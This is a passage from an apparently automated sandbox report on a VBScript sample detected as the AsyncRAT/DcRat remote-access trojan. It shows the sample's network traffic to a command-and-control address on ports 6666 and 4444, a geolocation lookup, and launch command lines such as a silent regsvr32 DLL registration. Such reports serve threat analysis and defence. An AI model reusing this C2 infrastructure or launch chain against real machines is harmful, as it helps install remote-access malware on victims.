                                  Apr 24, 2024 17:04:13.035501003 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035557032 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035563946 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035684109 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.035753012 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:13.035765886 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:13.077215910 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:14.571896076 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:14.624159098 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:14.988336086 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:15.030345917 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.343348026 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.344116926 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.704528093 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:15.704638958 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.705305099 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:15.750511885 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:15.750580072 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:16.066771030 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:16.067524910 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:16.152832031 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:16.480791092 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.359504938 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:17.397640944 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:17.758843899 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.758862019 CEST666649706139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.758924007 CEST497066666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:17.761858940 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:17.761924982 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:18.123552084 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:18.170948029 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:18.533842087 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:18.540096045 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:18.950172901 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:18.950258017 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:19.355915070 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:24.028048992 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:24.389457941 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:24.389714956 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:24.390969038 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:24.767265081 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:24.768702984 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:25.129985094 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:25.170886993 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:25.420809031 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:25.724340916 CEST8049716178.237.33.50192.168.2.5
                                  Apr 24, 2024 17:04:25.726677895 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:25.726880074 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:26.046205044 CEST8049716178.237.33.50192.168.2.5
                                  Apr 24, 2024 17:04:26.046310902 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:26.077852964 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:26.480777979 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:27.040520906 CEST8049716178.237.33.50192.168.2.5
                                  Apr 24, 2024 17:04:27.040647030 CEST4971680192.168.2.5178.237.33.50
                                  Apr 24, 2024 17:04:29.437134027 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:29.840279102 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:29.840349913 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:30.202245951 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:30.249099016 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:30.610204935 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:30.611762047 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:31.027595043 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:31.027725935 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:31.433986902 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:41.515314102 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:41.918186903 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:41.918346882 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:42.280313015 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:42.327068090 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:42.688426971 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:42.689769983 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:43.105921984 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:43.106133938 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:43.325911045 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:43.327096939 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:43.511955976 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:43.736296892 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:44.567497015 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:44.623986006 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:44.984982967 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:45.030174971 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:53.592957973 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:53.999402046 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:53.999527931 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:54.361356020 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:54.405122042 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:54.766321898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:54.768198967 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:55.184164047 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:04:55.184251070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:04:55.592485905 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:05.671264887 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:06.074652910 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:06.077135086 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:06.442715883 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:06.483210087 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:06.844181061 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:06.889477015 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:06.956585884 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:07.372056961 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:07.372217894 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:07.778050900 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:13.361308098 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:13.362648010 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:13.777647018 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:14.567028999 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:14.608272076 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:14.970283031 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:15.014444113 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:17.749406099 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:18.153352976 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:18.153498888 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:18.515654087 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:18.561302900 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:18.924050093 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:18.925594091 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:19.341660023 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:19.341766119 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:19.747463942 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:29.830374956 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:30.246853113 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:30.246923923 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:30.608836889 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:30.654987097 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:31.016954899 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:31.020461082 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:31.434261084 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:31.434386015 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:31.840590954 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:41.956171036 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:42.371726036 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:42.371838093 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:42.735575914 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:42.920522928 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:43.215689898 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:43.215832949 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:43.217377901 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:43.281400919 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:43.281514883 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:43.388142109 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:43.389396906 CEST497154444192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:43.621488094 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:43.622416019 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:43.793864965 CEST444449715139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:44.027882099 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:44.586863041 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:44.654289007 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:45.016602993 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:45.233062029 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:45.512253046 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:45.512423038 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:54.030632973 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:54.435460091 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:54.435620070 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:54.797209024 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:54.842359066 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:55.203253031 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:55.205682039 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:55.622039080 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:05:55.622136116 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:05:56.028399944 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:06:06.108513117 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:06:06.512456894 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:06:06.512511969 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:06:06.876671076 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:06:07.014163017 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:06:07.371965885 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:06:07.372037888 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:06:07.377212048 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:06:07.377275944 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:06:08.078872919 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:06:08.482409000 CEST666649704139.99.133.66192.168.2.5
                                  Apr 24, 2024 17:06:08.482527018 CEST497046666192.168.2.5139.99.133.66
                                  Apr 24, 2024 17:06:08.887584925 CEST666649704139.99.133.66192.168.2.5

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Apr 24, 2024 17:04:25.255101919 CEST5868353192.168.2.51.1.1.1
                                  Apr 24, 2024 17:04:25.413851023 CEST53586831.1.1.1192.168.2.5

                                  DNS Queries

                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Apr 24, 2024 17:04:25.255101919 CEST192.168.2.51.1.1.10x539bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                  DNS Answers

                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Apr 24, 2024 17:04:17.106487036 CEST1.1.1.1192.168.2.50x3940No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                  Apr 24, 2024 17:04:17.106487036 CEST1.1.1.1192.168.2.50x3940No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Apr 24, 2024 17:04:25.413851023 CEST1.1.1.1192.168.2.50x539bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                  Apr 24, 2024 17:05:18.808346033 CEST1.1.1.1192.168.2.50x6e45No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                  Apr 24, 2024 17:05:18.808346033 CEST1.1.1.1192.168.2.50x6e45No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false

                                  HTTP Request Dependency Graph

                                  • geoplugin.net

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.549716178.237.33.50803252C:\Windows\winhlp32.exe
                                  TimestampBytes transferredDirectionData
                                  Apr 24, 2024 17:04:25.726880074 CEST71OUTGET /json.gp HTTP/1.1
                                  Host: geoplugin.net
                                  Cache-Control: no-cache
                                  Apr 24, 2024 17:04:26.046205044 CEST1173INHTTP/1.1 200 OK
                                  date: Wed, 24 Apr 2024 15:04:25 GMT
                                  server: Apache
                                  content-length: 965
                                  content-type: application/json; charset=utf-8
                                  cache-control: public, max-age=300
                                  access-control-allow-origin: *
                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 31 30 35 2e 33 36 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4c 61 73 20 56 65 67 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 4e 56 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 76 61 64 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 38 33 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 36 2e 31 36 38 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 31 31 35 2e 31 31 36 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4c 6f 73 5f 41 6e 67 65 6c 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                  Data Ascii: { "geoplugin_request":"154.16.105.36", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Las Vegas", "geoplugin_region":"Nevada", "geoplugin_regionCode":"NV", "geoplugin_regionName":"Nevada", "geoplugin_areaCode":"", "geoplugin_dmaCode":"839", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"36.1685", "geoplugin_longitude":"-115.1164", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Los_Angeles", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:17:03:56
                                  Start date:24/04/2024
                                  Path:C:\Windows\System32\wscript.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
                                  Imagebase:0x7ff69b660000
                                  File size:170'496 bytes
                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:2
                                  Start time:17:03:57
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\wscript.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"
                                  Imagebase:0x3b0000
                                  File size:147'456 bytes
                                  MD5 hash:FF00E0480075B095948000BDC66E81F0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2086281820.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2085839663.0000000005670000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2086115387.0000000005ED0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                  • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts, Description: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc., Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: 00000002.00000002.2086059197.0000000005E40000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:3
                                  Start time:17:03:58
                                  Start date:24/04/2024
                                  Path:C:\Windows\SysWOW64\regsvr32.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
                                  Imagebase:0x850000
                                  File size:20'992 bytes
                                  MD5 hash:878E47C8656E53AE8A8A21E927C6F7E0
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:4
                                  Start time:17:03:58
                                  Start date:24/04/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                  Imagebase:0xae0000
                                  File size:65'440 bytes
                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000004.00000002.3309788726.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
